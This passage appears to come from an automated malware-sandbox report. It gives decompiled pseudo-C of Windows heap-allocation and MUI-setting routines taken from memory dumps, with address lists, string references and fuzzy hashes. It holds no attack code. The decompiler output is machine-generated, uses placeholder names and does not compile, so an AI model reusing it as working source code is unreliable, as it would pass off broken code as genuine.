					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00EFB150();
						} else {
							E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00EFB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00F0EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00FB4496(_t181, 0);
						_t177 = L00F14620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00FB49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00FAFA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00EF1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00F216C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00FB4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xfe6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xfe6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xfe6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00F9D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00EFB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00EFB150("Just allocated block at %p for %Ix bytes\n",  *0xfe6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xfe6378 = 1;
									 *0xfe60c0 = 0;
									asm("int3");
									 *0xfe6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xfe5708; // 0x0
					 *0xfeb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00F4D130(0, _t177, _t181);
				}
			}

0x00fb2d82
0x00fb2d84
0x00fb2d89
0x00fb2d8e
0x00fb2d90
0x00fb2d92
0x00fb2d97
0x00fb2d9a
0x00fb2da4
0x00fb2dc0
0x00fb2dc3
0x00fb2dd1
0x00fb2dd6
0x00fb2dd8
0x00fb30a7
0x00fb30a7
0x00fb30aa
0x00fb30aa
0x00fb30ad
0x00fb30b4
0x00000000
0x00fb30b9
0x00fb2de3
0x00fb2de8
0x00fb2deb
0x00fb2dee
0x00fb2df1
0x00fb2df3
0x00fb2dfb
0x00fb2dfb
0x00fb2df5
0x00fb2df5
0x00fb2df5
0x00fb2e04
0x00fb2e0a
0x00fb2e0d
0x00fb2e11
0x00fb2e11
0x00fb2e12
0x00fb2e15
0x00fb2e18
0x00fb2e1a
0x00fb3027
0x00fb3027
0x00fb302d
0x00fb3030
0x00fb304f
0x00fb3054
0x00fb3032
0x00fb3047
0x00fb304c
0x00fb305a
0x00fb3063
0x00000000
0x00fb2e20
0x00fb2e20
0x00fb2e23
0x00000000
0x00000000
0x00fb2e29
0x00fb2e2b
0x00fb2e47
0x00fb2e2d
0x00fb2e33
0x00fb2e38
0x00fb2e3f
0x00fb2e42
0x00fb2e42
0x00fb2e4e
0x00fb2e5d
0x00fb2e5f
0x00fb2e62
0x00fb2e66
0x00fb2e6b
0x00fb2e6d
0x00000000
0x00fb2e73
0x00fb2e73
0x00fb2e76
0x00fb2e7a
0x00fb2e83
0x00fb2e83
0x00fb2e83
0x00fb2e85
0x00fb2e87
0x00fb2e8a
0x00fb2e8d
0x00fb2e92
0x00fb2e9c
0x00fb2e9f
0x00fb2ea1
0x00fb2ea2
0x00fb2ea6
0x00fb2ea6
0x00fb2e9f
0x00fb2eab
0x00fb2eaf
0x00fb2edf
0x00fb2ee2
0x00fb2ee5
0x00fb2eb1
0x00fb2eb3
0x00fb2eb8
0x00fb2ebd
0x00fb2ec4
0x00fb2ed6
0x00fb2ec6
0x00fb2ec7
0x00fb2ecc
0x00fb2ecf
0x00fb2ed2
0x00fb2ed2
0x00fb2ed9
0x00fb2ed9
0x00fb2ee8
0x00fb2eeb
0x00fb2eef
0x00fb2ef2
0x00fb2efe
0x00fb2f04
0x00fb2f04
0x00fb2f04
0x00fb2f06
0x00fb2f0d
0x00fb2f0f
0x00fb2f13
0x00fb2f13
0x00fb2f1b
0x00fb2f21
0x00fb2f27
0x00fb2f95
0x00fb2f98
0x00fb2f9b
0x00fb2fa0
0x00000000
0x00000000
0x00fb2fa6
0x00fb2fa9
0x00fb2fac
0x00000000
0x00000000
0x00fb2fb2
0x00fb2fb9
0x00000000
0x00000000
0x00fb2fc3
0x00fb2fca
0x00000000
0x00000000
0x00fb2fd0
0x00fb2fd6
0x00fb2fd9
0x00fb2ff8
0x00fb2ffd
0x00fb2fdb
0x00fb2ff0
0x00fb2ff5
0x00fb300e
0x00fb300f
0x00fb301a
0x00000000
0x00fb2f29
0x00fb2f29
0x00fb2f2c
0x00fb2f4b
0x00fb2f50
0x00fb2f2e
0x00fb2f43
0x00fb2f48
0x00fb2f56
0x00fb2f64
0x00fb2f6c
0x00fb2f6c
0x00fb2f72
0x00fb2f76
0x00fb2f7c
0x00fb2f83
0x00fb2f89
0x00fb2f8a
0x00fb2f8a
0x00000000
0x00fb2f76
0x00fb2f27
0x00fb2e6d
0x00fb2da6
0x00fb2dab
0x00fb2db3
0x00fb2db9
0x00fb30bc
0x00fb30c1
0x00fb30c1

Strings

Just allocated block at %p for %Ix bytes, xrefs: 00FB2F5F
HEAP[%wZ]: , xrefs: 00FB2F3E, 00FB2FEB, 00FB3042
RtlAllocateHeap, xrefs: 00FB2DCA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00FB305E
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 00FB3015
HEAP: , xrefs: 00FB2F4B, 00FB2FF8, 00FB304F

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 1daba8d7a3ad01b2169dbb13ffbaf17af0befdb84b1165aee723837eb79b1e78
Instruction ID: adf06207432f6d046cc1a9f66e2dc3ec108bd550fd740922dddd4addbf0539a4
Opcode Fuzzy Hash: 1daba8d7a3ad01b2169dbb13ffbaf17af0befdb84b1165aee723837eb79b1e78
Instruction Fuzzy Hash: 2891D331A006889FCB21EF6AC855AEDBBF2FF49714F188059E549AB392C7359941EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00F03D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F03D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00F01B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00F01B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00F01B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00F01B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00F01B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00F14620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00F3F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00F41370(_t276, 0xed4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00F3BB40(0,  &_v68, _t170);
									if(L00F043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00F3BB40(_t257,  &_v68, _t243);
								if(L00F043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00F41370(_t278, 0xed4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00F14620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00F3F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00F41370(_v16, 0xed4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00F3BB40(_t262,  &_v68, _t244);
								if(L00F043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00F41370(_t282, 0xed4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00F3BB40(_t262,  &_v68, _t201);
							if(L00F043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00F14620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00F3F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00F41370(_t280, 0xed4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00F3BB40(_t267,  &_v68, _t245);
							if(L00F043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00F41370(_t284, 0xed4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00F3BB40(_t267,  &_v68, _t224);
						if(L00F043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00F177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00f03d3c
0x00f03d42
0x00f03d44
0x00f03d46
0x00f03d49
0x00f03d4c
0x00f03d4f
0x00f03d52
0x00f03d55
0x00f03d58
0x00f03d5b
0x00f03d5f
0x00f03d61
0x00f03d66
0x00f58213
0x00f58218
0x00f04085
0x00f04088
0x00f0408e
0x00f04094
0x00f0409a
0x00f040a0
0x00f040a6
0x00f040a9
0x00f040af
0x00f040b6
0x00f040bd
0x00f040bd
0x00f03d83
0x00f5821f
0x00f58229
0x00f58238
0x00f58238
0x00f5823d
0x00f5823d
0x00f03da0
0x00f03daf
0x00f03db5
0x00f03dba
0x00f03dba
0x00f03dd4
0x00f03e94
0x00f03eab
0x00f03f6d
0x00f03f84
0x00f0406b
0x00f0406b
0x00f0406e
0x00f0406e
0x00f04070
0x00f04074
0x00f58351
0x00f58351
0x00f0407a
0x00f0407f
0x00f5835d
0x00f58370
0x00f58377
0x00f58379
0x00f5837c
0x00f5837c
0x00f5835d
0x00000000
0x00f0407f
0x00f03f8a
0x00f03f8d
0x00f03f90
0x00f03f95
0x00f5830d
0x00f5830f
0x00f03f9b
0x00f03fac
0x00f03fae
0x00f03fb1
0x00f03fb1
0x00f03fb6
0x00f58317
0x00f5831a
0x00000000
0x00f03fbc
0x00f03fc1
0x00f03fc9
0x00f03fd7
0x00f03fda
0x00f03fdd
0x00f04021
0x00f04021
0x00f04029
0x00f04030
0x00f04044
0x00f04046
0x00f04046
0x00f04044
0x00f04049
0x00f58327
0x00f58334
0x00f58339
0x00f5833c
0x00f0404f
0x00f0404f
0x00f0404f
0x00f04051
0x00f04056
0x00f04063
0x00f04063
0x00f04068
0x00000000
0x00f04068
0x00f03fdf
0x00f03fe2
0x00f03fe4
0x00f03fe7
0x00f03fef
0x00f04003
0x00f04005
0x00f04005
0x00f0400c
0x00f04013
0x00f04016
0x00f04017
0x00f0401b
0x00f0401e
0x00000000
0x00f0401e
0x00f03fb6
0x00f03eb1
0x00f03eb4
0x00f03eb7
0x00f03ebc
0x00f582a9
0x00f582ab
0x00f03ec2
0x00f03ed3
0x00f03ed5
0x00f03ed8
0x00f03ed8
0x00f03edd
0x00f582b3
0x00f582b6
0x00000000
0x00f03ee3
0x00f03ee8
0x00f03eed
0x00f03ef0
0x00f03ef3
0x00f03f02
0x00f03f05
0x00f03f08
0x00f582c0
0x00f582c3
0x00f582c5
0x00f582c8
0x00f582d0
0x00f582e4
0x00f582e6
0x00f582e6
0x00f582ed
0x00f582f4
0x00f582f7
0x00f582f8
0x00f582fc
0x00f582ff
0x00f582ff
0x00f03f0e
0x00f03f11
0x00f03f16
0x00f03f1d
0x00f03f31
0x00f58307
0x00f58307
0x00f03f31
0x00f03f39
0x00f03f48
0x00f03f4d
0x00f03f50
0x00f03f50
0x00f03f53
0x00f03f58
0x00f03f65
0x00f03f65
0x00f03f6a
0x00000000
0x00f03f6a
0x00f03edd
0x00f03dda
0x00f03ddd
0x00f03de0
0x00f03de5
0x00f58245
0x00f03deb
0x00f03df7
0x00f03dfc
0x00f03dfe
0x00f03e01
0x00f03e01
0x00f03e06
0x00f5824d
0x00f5824f
0x00f58254
0x00000000
0x00f03e0c
0x00f03e11
0x00f03e16
0x00f03e19
0x00f03e29
0x00f03e2c
0x00f03e2f
0x00f5825c
0x00f5825f
0x00f58261
0x00f58264
0x00f5826c
0x00f58280
0x00f58282
0x00f58282
0x00f58289
0x00f58290
0x00f58293
0x00f58294
0x00f58298
0x00f5829b
0x00f5829b
0x00f03e35
0x00f03e38
0x00f03e3d
0x00f03e44
0x00f03e58
0x00f582a3
0x00f582a3
0x00f03e58
0x00f03e60
0x00f03e6f
0x00f03e74
0x00f03e77
0x00f03e77
0x00f03e7a
0x00f03e7f
0x00f03e8c
0x00f03e8c
0x00f03e91
0x00000000
0x00f03e91

Strings

Kernel-MUI-Language-SKU, xrefs: 00F03F70
Kernel-MUI-Language-Allowed, xrefs: 00F03DC0
WindowsExcludedProcs, xrefs: 00F03D6F
Kernel-MUI-Language-Disallowed, xrefs: 00F03E97
Kernel-MUI-Number-Allowed, xrefs: 00F03D8C

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 2a6c0081ecbda46219cc5616ec61a41102ac477a470a7ec00fcb8a72361ec0c9
Instruction ID: c3d09bea0e31654b681e6c70f4c983fa3c0ab52d6c78c4ae8a575813171d4015
Opcode Fuzzy Hash: 2a6c0081ecbda46219cc5616ec61a41102ac477a470a7ec00fcb8a72361ec0c9
Instruction Fuzzy Hash: CFF140B2D00619EFCB15DF94C941AEEBBB9FF48750F14006AEA05B7291D7349E05EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00406A98, Relevance: 6.4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

Strings

i, xrefs: 00406B4D
C, xrefs: 00406B46
b, xrefs: 00406B54
a, xrefs: 00406B5B
d, xrefs: 00406B62

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C$a$b$d$i
API String ID: 0-2334916691
Opcode ID: 1118b7cb4659e81ba5944bd68f9e79e41b825d512a6c4d958afbf0d79a2982fd
Instruction ID: 4c766fac28bede3df30e4655ca478f670b9ba197cbdcdc94af723cbc0b856e4d
Opcode Fuzzy Hash: 1118b7cb4659e81ba5944bd68f9e79e41b825d512a6c4d958afbf0d79a2982fd
Instruction Fuzzy Hash: 1E31D3B1A00208BAEB10EFA1DC81FFEB3B8EF85718F00441EF515E7241E77969418769

Uniqueness

Uniqueness Score: -1.00%

Function 00EF40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00EF40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00EFB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00EFB150(", passed to %s", _t29);
					}
					_push("\n");
					E00EFB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xfe6378 = 1;
						asm("int3");
						 *0xfe6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00ef40e6
0x00ef40e8
0x00ef40f1
0x00f5042d
0x00f5044c
0x00f50451
0x00f5042f
0x00f50444
0x00f50449
0x00f5045d
0x00f50466
0x00f5046e
0x00f50474
0x00f50475
0x00f5047a
0x00f5048a
0x00f5048c
0x00f50493
0x00f50494
0x00f50494
0x00000000
0x00f5049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00F5043F
RtlAllocateHeap, xrefs: 00F50468
, passed to %s, xrefs: 00F50469
HEAP: , xrefs: 00F5044C
Invalid heap signature for heap at %p, xrefs: 00F50458

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: d0948fedc630fbae995017199281e69d15a975b7a464d946291a7b5cace85b68
Instruction ID: 40d7b7ffdb4ce563bc7f170e6401bfc106930c341027fd85b464bcf2d63746f9
Opcode Fuzzy Hash: d0948fedc630fbae995017199281e69d15a975b7a464d946291a7b5cace85b68
Instruction Fuzzy Hash: 45014C325023889ED325D764E45EF6377E4DB01B31F29502BF708BB781CFA49845D111

Uniqueness

Uniqueness Score: -1.00%

Function 00F1A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00F1A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xfe8748 - 1;
					if( *0xfe8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
									_t260 = _t257 + 4;
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00EFB150();
								_t257 = _t260 + 4;
								__eflags =  *0xfe7bc8;
								if(__eflags == 0) {
									E00FB2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
